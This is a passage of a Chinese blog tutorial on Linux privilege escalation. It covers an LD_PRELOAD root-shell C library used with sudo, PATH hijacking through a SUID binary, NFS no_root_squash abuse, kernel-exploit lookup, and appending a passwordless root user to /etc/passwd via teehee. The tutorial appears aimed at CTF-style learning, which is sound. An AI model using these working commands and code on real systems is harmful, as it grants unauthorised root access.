                     data-src="https://pic4.zhimg.com/80/v2-1dbd5ce6af6b54da496314dcb294f49d_1440w.webp"
                     
                ></p>
<p>既然这里出现了vim，那我们为何不用suid提权呢？<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pica.zhimg.com/80/v2-def315f69e27411a85f11c8ec615d0a0_1440w.webp"
                     
                ><br>请注意，vim 及其副本并没有设置 SUID 位，因此，在枚举并查找 SUID文件时，无法发现此权限提升向量</p>
<h1 id="sudo提权"><a href="#sudo提权" class="headerlink" title="sudo提权"></a>sudo提权</h1><h3 id="利用-LD-PRELOAD"><a href="#利用-LD-PRELOAD" class="headerlink" title="利用 LD_PRELOAD"></a>利用 LD_PRELOAD</h3><p>如果启用“env_keep”选项，我们可以生成一个在程序运行之前加载和执行的共享库<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pica.zhimg.com/80/v2-d387882161490ea9483c4c017db6da38_1440w.webp"
                     
                ></p>
<p>此提权攻击向量的步骤可以概括如下：</p>
<ol>
<li>检查 LD_PRELOAD（使用 env_keep 选项）</li>
<li>编写一个简单的 C 代码，编译成共享对象文件（.so 扩展名）</li>
<li>使用 sudo 权限和指向我们.so 文件的 LD_PRELOAD 选项运行程序</li>
</ol>
<p>C 代码将简单地启动 root shell，可以写成如下</p>
<div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">void</span> _init() &#123;</span><br><span class="line">unsetenv(<span class="string">&quot;LD_PRELOAD&quot;</span>);</span><br><span class="line">setgid(<span class="number">0</span>);</span><br><span class="line">setuid(<span class="number">0</span>);</span><br><span class="line">system(<span class="string">&quot;/bin/bash&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>
<p>我们可以将此代码保存为 shell.c，并使用 gcc 编译成共享对象文件</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gcc -fPIC -shared -o shell.so shell.c -nostartfiles</span><br></pre></td></tr></table></figure></div>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic4.zhimg.com/80/v2-ae17e4d155594c477ca6ea2c7adce42d_1440w.webp"
                     
                ><br>通过指定 LD_PRELOAD 选项来运行程序<br><code>sudo LD_PRELOAD=/home/user/ldpreload/shell.so find</code><br>这将导致以 root 权限启动 shell 进程<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic1.zhimg.com/80/v2-6c78fd6037740c72b0d3e31b7fd3863a_1440w.webp"
                     
                ></p>
<h1 id="PATH提权"><a href="#PATH提权" class="headerlink" title="PATH提权"></a>PATH提权</h1><p>创建一个文件并将其编译成可执行文件并设置 SUID 位<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic4.zhimg.com/80/v2-9f7d27bc8c4b33204e7c6298f09a232d_1440w.webp"
                     
                ><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic3.zhimg.com/80/v2-d26c8b521276df559285faca4f18615c_1440w.webp"
                     
                ><br>现在用户可以访问设置了 SUID 位的“path”脚本<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic3.zhimg.com/80/v2-bf885fd5fcf270318230f4254bca5ddc_1440w.webp"
                     
                ><br>执行后，“path”将在 PATH 下列出的文件夹中查找名为“thm”的可执行文件</p>
<p>查看在 PATH变量 下列出的可写文件夹，我们可以在对应目录下创建一个名为 thm 的二进制文件，这样我们在运行“path”脚本时，就会执行到名为thm的二进制文件。 由于设置了 SUID 位，此二进制文件将以 root 权限运行。</p>
<p>可以使用“ <code>find / -writable 2&gt;/dev/null</code> ”命令简单地搜索可写文件夹。可以使用简单的 cut 和排序序列清理此命令的输出<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic4.zhimg.com/80/v2-092a4caec3e657c6de7e015ff97b82db_1440w.webp"
                     
                ><br>将此与 PATH 进行比较，将帮助我们找到我们可以使用的文件夹<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic4.zhimg.com/80/v2-2d8c4518a6cbff5d3f7c92796e8a1de1_1440w.webp"
                     
                ><br>可写子文件夹并不在PATH环境变量中<br>如果我们想更直接的看到PATH变量下的可写文件夹 可以用<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://picx.zhimg.com/80/v2-d0424e4f7b8f5bced9168c55b0612c2f_1440w.webp"
                     
                ><br>或者<code>find / -writable 2&gt;/dev/null | cut -d &quot;/&quot; -f 2,3 | grep -v proc | sort -u</code></p>
<p>更容易写入的文件夹可能是 &#x2F;tmp，但是因为 &#x2F;tmp 不在 PATH环境变量中，所以我们需要添加它。 我们使用<code>export PATH=/tmp:$PATH</code>来完成环境变量添加<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic3.zhimg.com/80/v2-88018808b5a86b275d6ec571134d9910_1440w.webp"
                     
                ><br>当“path”脚本执行时将在 &#x2F;tmp 文件夹下查找名为“thm”的可执行文件。 我们可以在&#x2F;tmp 文件夹下创建一个“thm”文件并将其内容设置为<code>/bin/bash</code><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic4.zhimg.com/80/v2-a9bf252bcfe338eb415d012c1ed2c91f_1440w.webp"
                     
                ><br>我们已经给&#x2F;bin&#x2F;bash 副本也就是thm文件 赋予了可执行权限，请注意此时它将以我们当前用户的权限运行；利用该文件提权的原理是让之前定义的“path”脚本以 root 权限运行，由于“path”脚本已经被设置了SUID位，所以直接执行该脚本即可<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic1.zhimg.com/80/v2-d641df843ac6f68f3162271a2078067c_1440w.webp"
                     
                ></p>
<h1 id="NFS提权"><a href="#NFS提权" class="headerlink" title="NFS提权"></a>NFS提权</h1><p>NFS（网络文件共享）配置保存在 &#x2F;etc&#x2F;exports 文件中，此权限提升向量的关键元素是 <strong>no_root_squash</strong>选项<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic1.zhimg.com/80/v2-51cc27ba394a69fc8f3ccb590971c884_1440w.webp"
                     
                ><br>默认情况下，NFS 会将 root 用户更改为 nfsnobody，并剥夺任何文件以 root 权限运行的权限。如果可写共享资源上存在 “no_root_squash” 选项，我们可以创建一个设置了 SUID 位的可执行文件，并在目标系统上运行它。<br>先从目标机中列举可挂载的份额<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic1.zhimg.com/80/v2-44424913e82a1290f7f22211c3fe57ca_1440w.webp"
                     
                ><br>在本地机上创建共享文件夹，并把它挂载到目标机器上<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic1.zhimg.com/80/v2-64f336ffb89a508cfecf90dc93105c22_1440w.webp"
                     
                ><br>在本地机上创建nfs.c并写入内容<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pica.zhimg.com/80/v2-32c13fb82f07f3cfe3285dcc88f60514_1440w.webp"
                     
                ><br>编译并设置 SUID 位<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic4.zhimg.com/80/v2-95269d0618128d2448eb6c2742298ed7_1440w.webp"
                     
                ><br>nfs.c 和 nfs 都存在于目标系统。我们已经处理了挂载的共享，因此没有 需要转移它们<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic4.zhimg.com/80/v2-bb99468d40ec0066426f171077c5493f_1440w.webp"
                     
                ></p>
<h1 id="系统漏洞提权"><a href="#系统漏洞提权" class="headerlink" title="系统漏洞提权"></a>系统漏洞提权</h1><p>查看发行版信息 <code>cat /etc/*release</code><br>查看内核版本的全部信息 <code>cat /proc/version</code><br>查看kali本地漏洞库里面的exp <code>searchsploit Ubuntu 16.04</code></p>
<h1 id="小众的提权方法"><a href="#小众的提权方法" class="headerlink" title="小众的提权方法"></a>小众的提权方法</h1><h3 id="teehee提权"><a href="#teehee提权" class="headerlink" title="teehee提权"></a>teehee提权</h3><p><code>sudo -l</code>查看sudo权限<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pica.zhimg.com/80/v2-8d03c5622667bcc0c28e52a1ec0a993c_1440w.webp"
                     
                ><br><code>echo &quot;admin::0:0:::/bin/bash&quot; | sudo teehee -a /etc/passwd</code>创建一个没有密码的<code>admin</code>用户，并赋予该用户root权限，进入的时候运行&#x2F;bin&#x2F;bash<br><code>su admin</code><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://pic1.zhimg.com/80/v2-eed51261147021ec2adabe526e04e93c_1440w.webp"
                     
                ></p>

        </div>

        
            <div class="post-copyright-info w-full my-8 px-2 sm:px-6 md:px-8">
                <div class="article-copyright-info-container">
    <ul>
        <li><strong>Title:</strong> Linux提权</li>
        <li><strong>Author:</strong> Saofe1a</li>
        <li><strong>Created at
                :</strong> 2025-04-07 10:54:06</li>
        
            <li>
                <strong>Updated at
                    :</strong> 2025-04-07 10:51:55
            </li>
        
        <li>
            <strong>Link:</strong> https://saofeia.github.io/2025/04/07/Linux提权/
        </li>
        <li>
            <strong>
                License:
            </strong>
            

            
                This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0">CC BY-NC-SA 4.0</a>.
            
        </li>
    </ul>
</div>

            </div>
        

        

        

        
            <div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
                
                    <div class="article-prev border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
                        <a class="prev"
                        rel="prev"
                        href="/2025/04/07/%E5%8F%8D%E5%90%91%20SSH%20%E6%9A%B4%E9%9C%B2%E9%9A%90%E8%97%8F%E6%9C%8D%E5%8A%A1/"
                        >
                            <span class="left arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-left"></i>
                            </span>
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">反向 SSH 暴露隐藏服务</span>
                                <span class="post-nav-item">Prev posts</span>
                            </span>
                        </a>
                    </div>
                
                
                    <div class="article-next border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
                        <a class="next"
                        rel="next"
                        href="/2024/12/02/VM%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/"
                        >
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">VM沙箱逃逸</span>
                                <span class="post-nav-item">Next posts</span>
                            </span>
                            <span class="right arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        


        
            <div class="comment-container px-2 sm:px-6 md:px-8 pb-8">
                <div class="comments-container mt-10 w-full ">
    <div id="comment-anchor" class="w-full h-2.5"></div>
    <div class="comment-area-title w-full my-1.5 md:my-2.5 text-xl md:text-3xl font-bold">
        Comments
    </div>
    

        
            
    <div id="waline"></div>
    <script type="module" data-swup-reload-script>
      import { init } from '/js/libs/waline.mjs';

      function loadWaline() {
        init({
          el: '#waline',
          serverURL: 'https://example.example.com',
          lang: 'zh-CN',
          dark: 'body[class~="dark-mode"]',
          reaction: false,
          requiredMeta: ['nick', 'mail'],
          emoji: [],
          recaptchaV3Key: "wasd",
          
        });
      }

      if (typeof swup !== 'undefined') {
        loadWaline();
      } else {
        window.addEventListener('DOMContentLoaded', loadWaline);
      }
    </script>



        
    
</div>

            </div>
        
    </div>

    
        <div class="toc-content-container">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">On this page</div>
        <div class="page-title">Linux提权</div>
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#SUID%E6%8F%90%E6%9D%83"><span class="nav-text">SUID提权</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8find%E6%8F%90%E6%9D%83"><span class="nav-text">利用find提权</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8bash%E6%8F%90%E6%9D%83"><span class="nav-text">利用bash提权</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#nmap%E6%8F%90%E6%9D%83"><span class="nav-text">nmap提权</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8vim%E6%8F%90%E6%9D%83"><span class="nav-text">利用vim提权</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#rbash%E7%8E%AF%E5%A2%83%E4%B8%8B%E6%8F%90%E6%9D%83"><span class="nav-text">rbash环境下提权</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8vi%E6%8F%90%E6%9D%83"><span class="nav-text">利用vi提权</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#python%E6%8F%90%E6%9D%83"><span class="nav-text">python提权</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8git%E6%8F%90%E5%8F%96"><span class="nav-text">利用git提取</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Capabilities"><span class="nav-text">Capabilities</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#sudo%E6%8F%90%E6%9D%83"><span class="nav-text">sudo提权</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8-LD-PRELOAD"><span class="nav-text">利用 LD_PRELOAD</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#PATH%E6%8F%90%E6%9D%83"><span class="nav-text">PATH提权</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#NFS%E6%8F%90%E6%9D%83"><span class="nav-text">NFS提权</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%B3%BB%E7%BB%9F%E6%BC%8F%E6%B4%9E%E6%8F%90%E6%9D%83"><span class="nav-text">系统漏洞提权</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%B0%8F%E4%BC%97%E7%9A%84%E6%8F%90%E6%9D%83%E6%96%B9%E6%B3%95"><span class="nav-text">小众的提权方法</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#teehee%E6%8F%90%E6%9D%83"><span class="nav-text">teehee提权</span></a></li></ol></li></ol></li></ol>

    </div>
</div>
        </div>
    
</div>



                

            </div>

            

        </div>

        <div class="main-content-footer">
            <footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2022</span>
              -
            
            2025&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">Saofe1a</a>
            
                
                <p class="post-count space-x-0.5">
                    <span>
                        11 posts in total
                    </span>
                    
                        <span>
                            15k words in total
                        </span>
                    
                </p>
            
        </div>
        
            <script data-swup-reload-script src="https://cn.vercount.one/js"></script>
            <div class="relative text-center lg:absolute lg:right-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-right">
                
                    <span id="busuanzi_container_site_uv" class="lg:!block">
                        <span class="text-sm">VISITOR COUNT</span>
                        <span id="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="lg:!block">
                        <span class="text-sm">TOTAL PAGE VIEWS</span>
                        <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a></span>
            <span class="text-sm lg:block">THEME&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.6.4</a></span>
        </div>
        
        
            <div>
                Blog up for <span class="odometer" id="runtime_days" ></span> days <span class="odometer" id="runtime_hours"></span> hrs <span class="odometer" id="runtime_minutes"></span> Min <span class="odometer" id="runtime_seconds"></span> Sec
            </div>
        
        
            <script data-swup-reload-script>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
            <li class="go-comment">
                <i class="fa-regular fa-comments"></i>
            </li>
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    

</main>


    
<script src="/js/libs/Swup.min.js"></script>

<script src="/js/libs/SwupSlideTheme.min.js"></script>

<script src="/js/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/libs/SwupPreloadPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>







<script src="/js/tools/imageViewer.js" type="module"></script>

<script src="/js/utils.js" type="module"></script>

<script src="/js/main.js" type="module"></script>

<script src="/js/layouts/navbarShrink.js" type="module"></script>

<script src="/js/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/layouts/categoryList.js" type="module"></script>





    
<script src="/js/tools/codeBlock.js" type="module"></script>




    
<script src="/js/layouts/lazyload.js" type="module"></script>




    
<script src="/js/tools/runtime.js"></script>

    
<script src="/js/libs/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">




  
<script src="/js/libs/Typed.min.js"></script>

  
<script src="/js/plugins/typed.js" type="module"></script>









<div class="post-scripts" data-swup-reload-script>
    
        
<script src="/js/tools/tocToggle.js" type="module"></script>

<script src="/js/layouts/toc.js" type="module"></script>

<script src="/js/plugins/tabs.js" type="module"></script>

    
</div>


</body>
</html>
